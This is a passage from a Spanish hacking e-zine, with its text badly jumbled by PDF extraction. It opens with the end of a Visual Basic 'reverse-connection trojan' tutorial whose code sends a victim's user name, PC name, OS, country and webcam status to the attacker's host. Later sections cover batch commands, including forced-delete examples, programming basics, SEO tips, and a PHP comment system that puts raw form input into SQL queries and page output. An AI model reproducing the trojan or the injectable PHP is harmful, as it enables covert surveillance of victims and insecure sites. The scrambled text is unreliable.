WS.Close ‘cerramos

Page 14: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Troyano de Conexión Inversa

WS.CONNECT ip, port ‘nos conectamos Voy a explicar un poco eso de split y arrays: End If Nosotros enviamos esto:

Conexión|Minombre|127.0.0.1|mascotas…. End Sub Entonces lo que hacemos es partirlo, y almacenarlo en un array(en data).

Private Sub WS_Connect() ‘al haber conexión,enviamos todos los datos

De manera que data(0) es lo primero, en este caso “Conexión”,por eso se hace Select Case data(0) porque lo usamos como identificador.

WS.SendData "Conexion|" & victima & "|" & nombrepc & "|" & name1 & "|" & so & "|" & GetRamSize & "|" & pais & "|" & procesador & "|" & tor & "|" & webcam Data(1) lo siguiente “Mi nombre” y así sucesivamente…. End Sub Private Sub WS_DataArrival(ByVal bytesTotal As Long) ‘al recibir los datos

Bueno, en la siguiente e-zine mas ;) Espero que les haya gustado, se que no me explico muy bien pero bueno… On Error Resume Next Si tienen dudas tienen el foro, saludos! Dim datos As String Si hay fallos notifíquenmelo! Dim data() As String Puede ser porque lo hice rapidito ^^

WS.GetData datos ‘los recibimos Data=split(datos,”|”) PD:El resultado final: Select case data(0) Case "nombrecan" ‘recuerden que fue lo que enviamos como marca al cambiar el nombre

Open Environ("windir") & "\KB007.txt" For Output As #1 Print #1, , data(1) ‘ponemos en el texto el nombre que se cambió Close #1 End select End sub

NOTA: Las constantes y módulos, no los he puesto para no llenar, lo he subido en un .txt, simplemente lean lo que digo para saber donde ponerlo, el link aquí:

By Don Nadie http://eric-programs.awardspace.com/CONSTANTESYDEMAS.txt

Bien, hemos visto que enviamos información al conectarse, ahora en el cliente, la recibimos y la mostramos: CLIENTE Case "Conexion" Dim x As ListItem Set x = lv.ListItems.Add(, Index & "|", data(1)) ‘añadimos los datos, y en la key el indice y “|” para luego partirlo y poder identificar x.SubItems(1) = WS(Index).RemoteHostIP ‘mas datos que añadimos.... x.SubItems(2) = data(2) & "/" & data(3) x.SubItems(3) = data(4) x.SubItems(4) = data(5) & " MB" x.SubItems(5) = data(6) x.SubItems(6) = data(7) x.SubItems(7) = data(8) x.SubItems(8) = data(9) x.SubItems(9) = "v.1" End Select

Page 15: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Introducción al Batch

Introducción al Batch by Furious Dami

¿En qué consiste Batch?

Batch es un lenguaje de programación que utiliza el Sistema Operativo MS-Dos como interprete. No necesita editores ni otros programas, se utiliza el Bloc de Notas (NotePad) o con cualquier editor de palabra: simplemente lo guardamos con extensión .bat. Cualquier archivo con extensión .bat es asumido por el sistema operativo como un ejecutable al igual que los archivos con extensión .exe y los .com, básicamente los archivos de proceso por lotes se puede correr desde cualquier parte, desde que se tenga un acceso directo o icono lo podemos lanzar desde el escritorio, una carpeta, en fin es un ejecutable (Windows nos permite especificarle al sistema operativo que archivos queremos que sean ejecutables) desde un bat también, solo es cuestión de modificar un poco el registro), incluso desde otros programas sin importar el tipo de lenguaje: por ejemplo se puede llamar un bat desde html, lo mismo que desde cualquier bat se pueden ejecutar otros programas, desde bat se puede hacer cualquier cosa que se base en Windows. El bloc de notas Para programar en Batch necesitaremos el Bloc de Notas de Windows, tal vez parezca algo poco común pero es la herramienta que se utiliza para programar en Batch. En el Bloc escribiremos los Source Code (Códigos Fuente) de nuestros Batch, luego en la opción “Guardar como…” elegimos todos los archivos y lo guardamos con extensión ".bat", debemos tener cuidado con estos archivos, por que si jugamos con comandos como del *.* o algo similar podríamos dañar estropear nuestros datos y hasta el S.O., claro que también existen formas de recuperarlos , pero esa no es la idea. Para ejecutar nuestros Batch necesitaremos la Consola (MS-Dos, Símbolo de sistema, Línea de comandos o como le quieran llamar) que podemos acceder a ella desde la opción Ejecutar del Menú Inicio, escribimos Cmd y listo. La consola es una pantalla negra en la que escribiremos los comandos y la que Ejecutara nuestros programas Batch.No todos los comandos que se usan en batch se aplican a la consola de comandos, claro que son pocos !!! Los Comandos de programación en Batch son los mismos usados en MS-Dos y a continuación daremos una breve explicación de cada comando y los parámetros utilizados. Para obtener información sobre cualquier comando tecleamos en la consola el nombre del comando. Ej:

.

Los Comandos presentados a continuación son tan solo los más usados para ver mas buscar en la carpeta “C:\Windows\System32” los archivos sin iconos y con extensión “.exe” o “.com”.

Comandos At: Programa comandos o archivos para que se ejecuten a una hora determinada. Attrib: Muestra y cambia los atributos de archivos. Cd: Muestra o cambia el directorio (carpeta) actual. Chdir: Muestra o cambia la carpeta actual. Chkdsk: Escanea y muestra el status de un disco. Cls: Borra la pantalla. Cmd: Inicia una nueva ventana del procesador de comandos de Windows XP. Color: Cambia los colores del fondo y de la letra de la consola. Comp: Compara el contenido de los archivos. Compact: Muestra o altera la compactación de archivos en discos NTFS. Convert: Convierte volúmenes FAT en NTFS. Copy: Copia uno o mas archivos a un directorio diferente. Date: Muestra o altera la fecha. Del: Borra archivos. Dir: Muestra todos los archivos en la carpeta actual. Diskcomp: Compara el contenido de dos discos de 3½. Diskcopy: Copia el contenido de dos discos de 3½. Erase: Borra archivos. Echo: Oculta el eco de los comandos (no permite que se vean los comandos). Exit: Sale de la consola. FC: Compara y exibe diferencias entre archivos. Find: Busca una secuencia de textos en uno o mas archivos. Format: Formatea un disco. Goto: Direcciona la consola a una línea de un archivo por lotes. IF: Realiza procesamiento bajo condiciones especificas de un archivo por lotes. Label: Cambia la etiqueta de volumen de un disco. MD: Crea una nueva carpeta. Move: mueve uno o más archivos de una carpeta a otra. Pause: Pausa el procesamiento de un archivo por lotes hasta presionar una tecla. Print: Imprime un texto o archivo. RD: Remueve una carpeta o directorio. Recover: Recupera información legible de un disco dañado. Rem: Graba comentarios en archivos por lotes o en Config.sys Ren: Cambia el nombre de un archivo. Replace: Substituye archivos. Set: Muestra, crea o borra las variables de entorno. Start: Inicia una ventana nueva para ejecutar un comando o programa. Subst: Asocia un camino a una letra de unidad.

Page 16: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Introducción al Batch Time: Muestra o modifica la hora del sistema. Tree: Exibe gráficamente el árbol de un directorio raíz. Type: Muestra el contenido de un archivo de texto. Title: Cambia el titulo de la ventana de la consola. Ver: Muestra la versión de Windows. Vol: Muestra la etiqueta y el volumen de una unidad. Shutdown: Apaga o reinicia la PC. Command: Inicia una nueva ventana del procesador de comandos de MS-Dos. Nul: Sirve para anular la respuesta de un comando. Tskill: Finaliza programas y procesos (solo para XP Home Edition). Taskkill: Finaliza programas y procesos (solo para XP Professional). Net: Administra y configura servicios.

Los Parámetros

Se usan para modificar o alterar la función de un comando. Por ejemplo el comando “DEL”. Del sin parámetros sirve para borrar archivos comúnmente, pero con los parámetros: /P: Solicita confirmación antes de borrar cada archivo. /F: Fuerza la eliminación archivos de solo lectura o del sistema. /S: Borra los archivos de la carpeta actual y todas las sub-carpetas. /A: Selecciona los archivos a ser borrados basándose en los atributos. Por ejemplo si utilizamos: Del /F /P autoexec.bat Nos pediría confirmación para borrar el archivo “autoexec.bat”, que es un archivo del sistema. NOTA: Los parámetros de los comandos que esten entre corchetes “[” “]” no son obligatorios. Los Asteriscos (*) Los asteriscos son comodines que sirven para indicar “todo”, aquí van algunos ejemplos de uso de los asteriscos: 1) Imagina que quieres eliminar todos los archivos .mp3 de la unidad C:\ El código en Batch sería: Del /Q /F C:\*.mp3 Que indica que se deben eliminar “todos” los archivos con extensión .mp3 de la unidad C: Si el código fuese: Del /Q /F C:\50ce*.mp3 Indicaría que elimine todos los mp3 que comiencen con el nombre “50ce” sin importar como terminen. Del /Q /F C:\*50ce.mp3 Indicaría que se eliminen todos los archivos mp3 que terminen en “50ce” sin importar como empiecen. 2) Supongamos que deseas borrar todo los archivos llamados Mío en Mis Documentos, para eso utilizarías: Del /Q /F “C:\Documents and Setings\%username%\Mis Documentos\Mio.*”

Con esto estas indicando que se borren todos los archivos que se llamen “Mío”, pero con todas las extensiones. 3) Si quieres eliminar todos los archivos de Word (.doc) y WorPad (.dot) en la unidad C: con el nombre Poemas se utilizan de esta forma: Del /Q /F C:\poemas.do* Esto indicaría que se eliminen todos los archivo con el nombre poemas, pero que tengan una extensión que comience con “do”. Los Redireccionadores (>> y >) Son usados para redireccionar la salida de texto enviada por un comando a cualquier otro archivo como en el siguiente caso: Pause > elpause.txt Si escribiéramos el comando pause solo, saldría el siguiente texto: Presione cualquier tecla para continuar… pero al colocar el redireccionador ese texto se guardaría en el archivo “elpause.txt”, otro ejemplo: echo Somos todos amigos > texto.txt En este caso la salida de texto del comando echo seria: Somos todos amigos Pero con el redireccionador “>” la frase “Somos todos amigos” seria guardada en el archivo “texto.txt”. El “>” En el siguiente caso: Echo La informática es interesante > info.txt El redireccionador crearía (en caso de que no existiese) un archivo llamado info que tendría adentro la frase “La informática es algo interesante, pero si ya existiese lo que haría seria borrar todo el contenido del archivo y añadirle la frase. El “>>” En el siguiente caso: Echo La informática es interesante >> info.txt El redireccionador crearía (en caso de que no existiese) un archivo llamado info que tendría adentro la frase “La informática es algo interesante, pero si ya existiese lo que haría a diferencia de “>” lo que haría seria añadirle luego de la ultima línea la frase.

El comando Nul y el “>”

En el siguiente caso: Echo La informática es interesante>nul El comando nul a diferencia de los otros no lo guardaría ni redireccionaria simplemente ANULARIA a la frase “La informática es interesante” y no permitiría que apareciera en pantalla. Las Comillas (“ ”) Se usan cuando hay espacios en una ruta o cadenas de comando. Por ej. : MD C:\Documents and settings\usuario\Mis Documentos\Super Carpeta Este código estaría erróneo por que faltan las comillas. El correcto sería: MD “C:\Documents and settings\usuario\Mis Documentos\Super Carpeta”

Page 17: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Introducción al Batch Como hay espacio en los nombres de las carpetas el código anterior no funcionaria pero usando las comillas se admiten los espacios en las rutas.

El signo Interrogación (?)

Este signo se usa como comodín para indicar que una letra o numero es desconocido, aquí algunos ejemplos: 1) Si quieres eliminar un documento de Word que sabes que empieza con “Gran” y que tiene 3 carctéres mas puedes usar: Del /Q /F C:\Gran???.doc El signo “?” indicaría que el resto que esas 3 letras son desconocidas y entonces la maquina buscaría los documentos que empezaran con “Gran” y continuaran 3 caracteres mas hacia delante. 2) Otro ejemplo es si queres mover todos los archivos que terminen con “G” y que tengan 5 letras antes. Move C:\?????G.* Con esto moveríamos todos los archivos que tengan “G” en el sexto lugar. 3) Si queremos eliminar los archivos de Texto que tengan 4 caracteres seria: Del C:\????.txt Con esto borraríamos todos los archivos de texto en la unidad C: sin importar que letras tengan. Los signos de % Este signo es usado para mostrar variables. Aquí alguna variables de entorno: %username% Con esto mostramos o introducimos el nombre del usuario actual por ejemplo si utilizamos: Echo El usuario es: %username% Con esto aparecería el mensaje: El usuario es: Furious Dami Si fuera el usuario conectado actualmente. %homedrive% Se usa para indicar el disco local o en el que esta el sistema operativo que estamos utilizando. %systemroot% Se usa para definir la carpeta en la que esta instalado Windows por ejemplo: C:\Windows %computername% Para mostrar el nombre de la computadora.. %homepath% Abreviación para ir a la ruta del usuario, Ej: C:\Documents and Settings\ElUsuario NOTA: Para variables del comando For en lugar de “%variable%” se usa “%variable”

El signo ̂

Este símbolo es útil para mostrar los %, &&, <, >,etc. ya que en Batch los caracteres especiales no son mostrados, y al utilizar estos símbolos si aparecen. Ejemplos

1) Supongamos que deseas escribir “Todo un 100%” echo Todo un 100% Esto no funcionaria porque el signo % intentaría mostrar una variable y no aparecería. Entonces el código sería así: Echo Todo un 100^% Al utilizar el símbolo ^ en el % aparecería y no estaría definiendo una variable. 2) Si deseas crear un menu que tenga la opción “<1> AGREGAR USUARIO” esto estaría mal: echo <1> AGREGAR USUARIO Porque el contenido del archivo “1” se mostraría en Echo y sería redireccionado a “AGREGAR USUARIO”. El código correcto sería así: echo ^<^> AGREGAR USUARIO Con esto el > no estaría redireccionando nada y se mostraría en pantalla.

El Signo &

Este es un signo que indica el procesamiento de varios comandos en la misma línea. Cuando es & espera que se ejecute el primer comando y ejecuta el segundo si el primero finaliza correctamente, pero cuando es && no es necesario que el primer comando finalice correctamente. A continuación un ejemplo: Para hacer que se ejecuten el Internet Explorer y El Bloc de Notas con el comando IF al elegir la opción 1 se utilizaría así: If %variable%==1 (Start iexplore && Start notepad) Así con el mismo número de opción se ejecutarían el Internet Explorer (Iexplore) y el Bloc de Notas (notepad).

By Furious Dami

Resultado de set

Page 18: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Introducción al Batch

Resultado de systeminfo

Resultado help

Page 19: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Metodología de la programación Editorial

Algoritmo Conjunto de operaciones (sentencias y proposiciones) y procedimientos (Toma de decisiones procesos) que deben seguirse para la resolución de un problema. El origen etimológico de la palabra deriva del nombre

latinizado del gran matemático árabe Mohamed Ibn Moussa Al Kow Rizmi, el cual escribió su obra Quitab Al Jabr Al Mugabala, donde se recogía el sistema de numeración hindú y el concepto del cero. Fue el gran matemático Fibonacci, quien tradujo su obra al latín y la inició con las palabras: Algoritmi dicit.

Cuando se usa el lenguaje algorítmico debe hacerse un análisis previo del problema que se va resolver, de las deducciones que se saquen se encuentra un método que permita resolverlo, todas esas operaciones a realizar, y el orden especifico en que se ejecutan es lo que se denomina algoritmo, dicho algoritmo se codifica o compila a un sistema comprensible por el computador.

Características: Inicio, fin Preciso Simple, Breve y conciso Sencillo, Legible. Modular. Eficiente y Efectivo.

PSEUDOCÓDIGO El pseudocódigo describe un algoritmo utilizando distintas frases comunes e instrucciones de programación y palabras nemotécnicamente modificadas que definen la estructura básica del mismo. Permitiendo al programador centrarse en los aspectos lógicos de la solución al problema, evitando reglas de sintaxis de los lenguajes de programación. Ningún Pseudocódigo es estándar, varia de una persona a otra.

DIAGRAMA DE FLUJO Representa la esquematización grafica de un algoritmo. En realidad muestra gráficamente los pasos o procesos, a seguir para alcanzar la solución de un problema. Si el diagrama ha sido elaborado correctamente, el paso al lenguaje de programación es simple y directo

Simbología de los diagramas de flujo

Fig. 1 Inicio-fin Proceso Entrada Decisión Imprimir Conexión Conexión Decisión Externa Interna Múltiple

Flujo o dirección del programa. Secuenciación Es una estructura de control que permite al computador, ejecutar una acción después de otra y luego la que sigue y así sucesivamente .Estas acciones consisten en:

variables, operaciones primitivas elementales, leer los datos y todos aquéllos procesos que se necesiten para la resolución del problema. Cada instrucción lleva etiquetado un numero en orden descendente empezando con el 1.

Page 20: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Elementos básicos de un algoritmo. Encabezado-> Nombre del algoritmo

Inicio-> Todo algoritmo empieza con la etiqueta 1

Declaraciones-> se declaran variables, funciones , etc.

Procesos->Leer, calcular, imprimir

Fin->

Ejemplo

Sueldo empleado (Rango)

1 inicio

2 cve, ht: entero

Pht, sueldo: real (flotante)

3 Leer cve, ht, pht

4 sueldo=ht*pht

5 imprimir cve, sueldo

6 fin

Fig.2

Datos Los datos son el alma y vida de una computadora, todo gira en torno a ellos, los datos pueden ser simples o estructurados, los datos simples son aquellos que solo ocupan una casilla de memoria, significando así que corresponden a un único valor. Ellos pueden ser: Numéricos (Reales, Enteros, de coma flotante, y exponenciales) de Carácter (caracteres, cadenas de caracteres y caracteres ASCII) y lógicos (Booleanos )

De igual forma existen los datos estructurados, a los que para cada dato le son asignadas varias casillas de memoria, pudiendo ser cadenas de caracteres ->(Strings), arreglos ->(Array) y registros-> (Record- En Bases de datos)

Identificadores Son nombres que representan un objeto dentro de un programa (constantes, variables, datos, procedimientos, funciones), asignar un nombre a las celdas o casillas de

la memoria en el computador , deben tener ciertas reglas en cuanto a su escritura se refiere: no deben empezar con números, no tener espacios en blanco, entre otros mas.

Constantes Es un valor fijo que no puede ser modificado, asignado dentro del programa en ejecución durante el proceso de compilación.

Variables Son valores que se asignan para modificarse durante la ejecución o la compilación de un programa.

Hasta que no se le da un valor a una variable dentro de un programa, no podemos hacer uso de ella, denominándose a este proceso: sentencia de asignación, siendo esta una operación de destrucción ya que el valor asignado se pierde cuando se sustituye por el nuevo valor .También se debe tener en cuenta que el tipo de expresión debe ser del mismo tipo que el de la variable.

Operadores-> Aritméticos y Lógicos

Se usan para efectuar operaciones aritméticas o lógicas dentro de todos los lenguajes de programación cuando se

combinan variables y constantes para crear funciones y se juntan con los operadores aritméticos se forman expresiones aritméticas, que generan un valor, puede ser: verdadero o falso.

Page 21: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Operadores Aritméticos Son los conocidos por todos, ,existen todos los lenguajes.

+ Suma - Resta * Multiplicación / División ^ Exponenciación mod Módulo div División entera

Operadores Lógicos En ocasiones en los programas se necesitan realizar comparaciones entre distintos valores, esto se realiza utilizando los operadores relaciones, los cuales se listan a continuación

Operador < Menor que > Mayor que

<= Menor o igual que >= Mayor o igual que = Igual a

<> Distinto a, diferente de

Jerarquía o Precedencia de Operadores Cuando aparecen dos o mas expresiones aritméticas debemos tener en cuenta la prioridad de la operación a desarrollar, los paréntesis tiene la mayor prioridad, se realizan las operaciones siempre, empezando desde el más interno del nido.

Glosario 1 Algoritmo Sucesión o secuencia ordenada y cronológica de pasos o actividades que conllevan a la solución de un problema o a la ejecución de una labor (o acción).

Programa Conjunto de sentencias o instrucciones que hacen funcionar a un computador, por lo general estan compuestos por una serie de módulos y estructuras, ellos realizan un proceso que suple una necesidad de un sistema especifico de información. Al conjunto de programas escritos en y para los computadores se le acuña un término en ingles, muy conocido: Software.

Pseudocódigo Término para referirse a un algoritmo, recurriendo a una mezcla de oraciones o palabras en lenguaje cotidiano, instrucciones de programación y

Flujograma o Diagrama de flujo Es la representación o esquematización gráfica de un algoritmo, existen unas normas o estándares representativos que definen el tipo de estructura algorítmica, ver Figs. 1 y 2

Tipo de dato Define un valor para cada dato y la forma con que será almacenado y procesado posteriormente, los datos pueden ser : numéricos (Reales ,flotantes, etc.), de caracteres, booleanos o lógicos, Etc., cuando un dato se guarda en memoria debe asignársele un valor, para poder realizar posteriormente un determinado proceso correctamente, hay que tener en cuenta que un solo error en la asignación del tipo de dato o un error de escritura pueden dar al traste con todo un programa , es muy importante saber definir el valor a los datos para el apropiado funcionamiento de cualquier programa.

Ciclo (Bucle o Loop) Es una repetición de sentencias o secuencia de sentencias un número definido de veces o iteraciones.

Identificador Son calificativos que se usan para hacer referencia a variables, constantes, funciones o cualquier objeto definido: bien sea por el programador o por el usuario.

Constante Son datos predefinidos que permanecen intactos durante la ejecución de un programa.

Variable Es un dato identificador que cambia su valor (existe un valor para cada tipo de dato) mientras el programa esta en acción,

Rutina Secuencia de instrucciones o sentencias (modulo), que hace parte de un programa y que puede usarse varias veces dentro de la ejecución del mismo.

Page 22: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Metodología de la Programación

Acceso Referencia que se hace a a un elemento específico dentro de un arreglo, indicando el nombre del arreglo y la posición del arreglo (índice).

Índice Valor que especifica un rango (nombre y ubicación) dentro de un arreglo.

Arreglo Es un tipo de dato que contiene una estructurado que permite almacenar varios valores de un mismo tipo, a cada uno de los cuales se accede por un índice entero.

Matriz Es una variable que permite almacenar múltiples valores de un mismo tipo.

Este articulo es tan solo una introducción a la metodología de la programación, en la próxima parte practica: diseño de algoritmos y diagramas de flujo, espero lo hayan disfrutado, ah! y si, es de ustedes , hagan lo que quieran con el ! Editorial

Page 23: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Varios Conocimientos Web

Varios Conocimientos Web By Gallloo Distintas secciones en un mismo documento

index.php <ul> <li><a href="index.php?pag=home">Home</a></li> <li><a href="index.php?pag=des">Descargas</a></li> <li><a href="index.php?pag=jue">Juegos</a></li> <li><a href="index.php?pag=info">Info</a></li> </ul> <?php if(!isset($_GET["pag"])){ // si no existe la variable de URL, pag... echo'<script>top.location="index.php?pag=home";</script>'; //redirigimos a home } if($_GET["pag"]=="home"){ echo'Bienvenido a mi web... blablabla'; //si la variable es igual a home hacemos tal } if($_GET["pag"]=="des"){ echo'Descargate estos magníficos programas....'; //si la variable es igual a des hacemos tal } if($_GET["pag"]=="jue"){ echo'Aquí tienes varios juegos:...'; //si la variable es igual a jue hacemos tal } } if($_GET["pag"]=="info"){ echo'Información'; //si la variable es igual a info hacemos tal } ?> Ahí dejo explicado de forma breve como hacer una web con diferentes secciones en un mismo documentos php, ahora veremos como hacer un sistema de comentarios algo más complejo ya que requiere algún conocimiento de mysql también.

Sistema básico de comentarios

Crearemos 3 archivos: -index.php – ahí se encontrarán los comentarios y es donde se postearán. -bd.php – aquí se encuentra toda la información sobre para conectarnos a la base de datos. -crear.php – solo lo abrimos una vez y nos servirá para crear las tablas. bd.php <?php 

$servidor="server.com:port"; $user="usuario"; $pass="password"; $conexion=mysql_connect($server,$user,$pass);//nos conectamos mysql_select_db("nombre_bd",$conexion); //especificamos la base de datos ?>  index.php <?php echo'<form action="index.php?mostrar=si" method="post" > <input type="text" name="nick" size="20"  /><br /><br /> <textarea name="texto" rows="7"></textarea><br /><br /> <input type="submit" value="Enviar" /> </form><br /><br />'; //formulario  include("bd.php");  //incluimos la info de la bd $query1=mysql_query("select texto from comentario",$conexion); //llamamos al texto de la tabla  $query2=mysql_query("select nick from comentario",$conexion); //llamamos al nick de la tabla  while($d1=mysql_fetch_array($query1)){ //la pasamos a array   $d2=mysql_fetch_array($query2);   echo $d1[0]."<br>by ".$d2[0]."<br><br>"; //muestra todos las filas } if($_GET["mostrar"]=="si"){ //si la variable GET llamada mostrar es //igual a "si"...   $nick=$_POST["nick"]; //recibimos el nick del form   $texto=$_POST["texto"]; //recibimos el texto del form   mysql_query("insert into comentario(nick, texto) values('$nick','$texto')",$conexion); //insertamos los datos en la bd   echo '<script>top.location="index.php";</script>'; //redirigimos a la pagina principal //mediante javascript } ?> 

crear.php <?php include("bd.php");//incluimos la info de la bd para crear la tabla mysql_query("create table comentario(nick varchar(50),texto text)",$conexion); //creamos la 

Page 24: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edicion Varios Conocimientos Web

tabla mysql_close($conexion);//cerramos la conexión ?>  Bueno, el sistema de comentarios ya está, no le he añadido ninguna hoja de estilos ni nada (estará un poco soso) pero eso ya lo dejo que lo hagáis vosotros. Ahora explico como subir los archivos al FTP para los más nuevos en la programación web. Buscamos un hosting

En esta ocasión va a ser este

Nos registramos, poniendo nuestros datos

Ahora nos redireccionará a un pdf con todos los datos de acceso. Nos pillamos la ultima versión de filezilla aunque hay otra mas reciente en español pero está en beta,

recuerdo que también está disponible para linux y tros sistemas operativos.

Subimos los ficheros de la web por el FTP

onemos los datos en el filezilla y nos conectamos

ubimos los archivos de la web

lo tenemos subido

una uda psección de webmasters. By Gallloo

o

P

S

Ya

Esto, es todo! Si tenéis alg d ostead en la

Page 25: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Posicionamiento Web

Posicionamiento web by XD Antes que nada tienes que decidir para que estas haciendo tu Web para ganar dinero o para ganar users algunas veces sobre todo si apenas comienzas en creación de Web , al ponerle publicidad pierdes cosas útiles para tus visitantes y también al contrario pasa lo mismo al optimizarla para los buscadores.

Dar de alta en google y en otros Aunque google no asegura que tu url la va a indexar mándala varias veces no te penaliza ni nada, también es importante darla de alta en otros buscadores aunque es cierto que q la mayoría usa google no esta de mas también inscribirlo en otros: google http://www.google.com/intl/es/addurl.html msn http://search.msn.com/docs/submit.aspx yahoo altavista http://es.altavista.com/addurl/default

DMOZ : Open Directory Project DMOZ : Open Directory Project , ODP , o algunos le llaman directory de mozilla. Para aparecer en los primeros lugares en google tienes que estar en ese directorio porque es donde se basa para listar las Webs Intenta inscribirte realmente es difícil pero si lo consigues será un grande logro ¿nada mas google? no la mayoría AOL Search, Lycos, HotBot, DirectHit y otros cientos más Dmoz.org Es un directorio de webs creado por Netscape y AOL se divide en idiomas países categorías se basa en usuarios editores como la Wiki puedes entrar como editor pero no es necesario para que te agreguen tu Web al ser como la wiki existen parecidos problemas editores malos etc. DMOZ es gratis y no lo confundas no es buscador aunque tiene uno pero solo es interno es un directorio y es totalmente gratis aparecen sitios basura en DMOZ pero porque lleva varios años online desde 1998 Recomendaciones de tu Web tiene que estar bien hecha no la clásica que parece geocities de hace 15 años no un myspaces spacelive tener dominio propio Web terminada:

Ejemplo no próximamente y que algunos link están muertos tu Web tiene q estar bien hecha accesible y no confusa para tus visitantes si esta hecha con algún script prefabricado dejarle los créditos sin faltas de ortografía sugiérelo en la categoría correcta si algún sitio de tu competencia (temática) esta ve que categoría es y ahí inscribe tu Web no la mandes varias veces por que los editores se molestan y no la mandas en cada categoría mándala en una y los editores si ven que podría tener doble triple etc. la pondrán existen rumores que algunos editores cobran por aceptarte la Web si detectas algún abuso en el DMOZ Escribe en http://dmoz.org/cgi-bin/feedback.cgi

Como sugerir un sitio a DMOZ fuente:http://www.dmoz.org

Paso1 ¿Cómo agrego un sitio al Open Directory Project? Agregar un sitio es fácil. Simplemente siga estas instrucciones. Cómo sugerir un sitio a Open Directory * No envíe sitios espejo. Sitios espejo son aquellos que tienen un contenido idéntico pero con URLs distintos. * No envíe URLs que contengan únicamente el mismo o similar contenido que otros sitios que puedan estar listados en el directorio. Sitios con contenido coincidente y repetitivo no son útiles para los usuarios del directorio. Múltiples envíos del mismo sitio o de sitios relacionados puede producir que sean excluidos y/o borrados estos sitios y todos sus afiliados. * No disfrace sus envíos para sugerir el mismo URL más de una vez. Ejemplo: http://www.dmoz.org http://www.dmoz.org/index.html * No envíe ningún sitio con una URL que redireccione a otra distinta. * El Open Directory tiene una política contra la inclusión de sitios con contenido ilegal. Ejemplos de material ilegal incluyen pornografía infantil, difamación, materiales que infrinjan algún derecho de la propiedad intelectual y material que específicamente apoye, solicite o ampare actividades ilegales (como el fraude o la violencia). * No envíe sitios "En construcción". Espere hasta que el sitio esté terminado antes de enviarlo. Sitios incompletos, con avisos "En construcción" o que contengan gráficos o enlaces rotos no son buenos candidatos para el directorio.

Page 26: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edicion Posicionamiento Web

* Envíe los sitios de pornografía a la categoría apropiada dentro de Adult. * Envíe los que no están en inglés a la categoría apropiada dentro de World. * No envíe sitios compuestos mayoritariamente por enlaces afiliados. Paso 2 Realice una búsqueda rápida en el directorio en dmoz.org para asegurarse de que su sitio no está ya incluido. De esta forma todos ahorraremos tiempo. Paso 3 Identifique la categoría (una sola) que mejor defina su sitio. El Open Directory posee una enorme variedad de temas entre los que elegir. Deber enviar su sitio a una única categoría, la que sea más relevante. Los sitios enviados a categorías inapropiadas o no relacionadas pueden ser rechazados o eliminados. Nota: algunas categorías no ofrecen los enlaces "Sugerir URL" o "Actualizar URL". Estas categorías no aceptan envíos, por lo tanto debería encontrar una categoría más específica para su sitio. Paso 4 Una vez que ha seleccionado la mejor categoría para su sitio, vaya directamente a esa categoría en dmoz.org y entonces utilice "Sugerir URL". Siga las instrucciones del formulario de envío cuidadosamente. La descripción debería informar del contenido del sitio de forma concisa y precisa. No deben ser de naturaleza promocional. Enviar una descripción promocional en vez de una objetiva y bien escrita puede retrasar significativamente el listado de su sitio o impedir totalmente que sea listado. El software para el envío automático de sitios es (y siempre ha sido) una violación de este proceso. Los sitios enviados automáticamente son marcados y después de aceptarse el envío, borrados sin notificárselo. Los envíos automatizados enviados de forma persistente nos obligarán a excluirle de dmoz, así podremos ofrecer los recursos a personas reales. Un editor de ODP revisará su envío para determinar si se incluirá en el directorio. En función de distintos factores como el volumen de envíos a una categoría en particular, puede llevar hasta varias semanas o más antes de que su envío sea revisado. Por favor envíe cada URL al Open Directory una sola vez. Le repetimos que el envío reiterado del mismo o de sitios relacionados puede conllevar la exclusión y/o eliminación de ésos y todos los sitios afiliados. Disfrazar su envío y sugerir la misma URL más de una vez no está permitido. Actualizar su sitio Si un sitio ha sido aceptado en el directorio pero no está satisfecho con la descripción o el título del sitio, puede ir a la categoría donde está listado y rellenar el formulario "actualizar URL". Si no está satisfecho con la categoría donde su sitio está listado, puede enviar un email a un editor de la categoría explicando su desacuerdo. Sea civilizado y educado, los comportamientos amenazadores u ofensivos no serán tolerados.

Si (y sólo si) no está de acuerdo con la respuesta del editor, puede usar el enlace "reportar abuso/spam" en la parte superior de la página para recurrir la decisión del editor. Sea concreto con respecto a su desacuerdo (incluyendo por qué piensa que la respuesta del editor es inadecuada). Los comentarios realizados por medio del enlace "reportar abuso/spam" son revisados por el staff del ODP, que tomará la decisión final. Por favor, NO envíe mensajes a Netscape, eso sólo retrasará y complicará el proceso. Nos tomamos muy en serio las observaciones y les prestamos gran atención. Pero recuerde que debemos mantener nuestro criterio y realizar numerosos juicios sobre cómo hacer el ODP tan útil como sea posible, independientemente de la decisión que tomemos, no conseguiremos satisfacer siempre a todos. Posicionando su sitio en portales y motores de búsqueda que utilizan los datos del ODP Si su sitio ha sido aceptado en el Open Directory, puede tardar de dos semanas a varios meses en ser listado en los sitios que utilizan los datos del ODP, como por ejemplo AOL Search, Google, Netscape Search, Yahoo Search, y otros cientos de sitios. Actualizamos los datos disponibles semanalmente, pero cada uno de estos sitios tiene su propio calendario de actualizaciones. Criterio editorial Procedimiento una vez que ha sugerido su sitio Por favor, comprenda que hacer del ODP un recurso valioso, requiere que apliquemos nuestro criterio editorial para determinar el contenido y la estructura del directorio. Ese criterio se extiende (pero no se limita) a qué sitios incluir, dónde se colocan los sitios dentro del directorio, cuándo y si procede incluir más de un enlace a un sitio, cuándo son apropiados los enlaces profundos y el contenido del título y la descripción del sitio. Además, la situación de un sitio en el directorio es susceptible de ser modificada y borrado en cualquier momento a nuestro único criterio. No debería dar por supuesto que un sitio será incluido en el directorio. Por favor, comprenda que al aplicar el criterio de edición puede que no se trate por igual a todos los envíos. Puede que no coincida siempre con nuestras decisiones, pero esperamos que se dé cuenta de que hacemos todo lo que podemos para tomar decisiones justas y 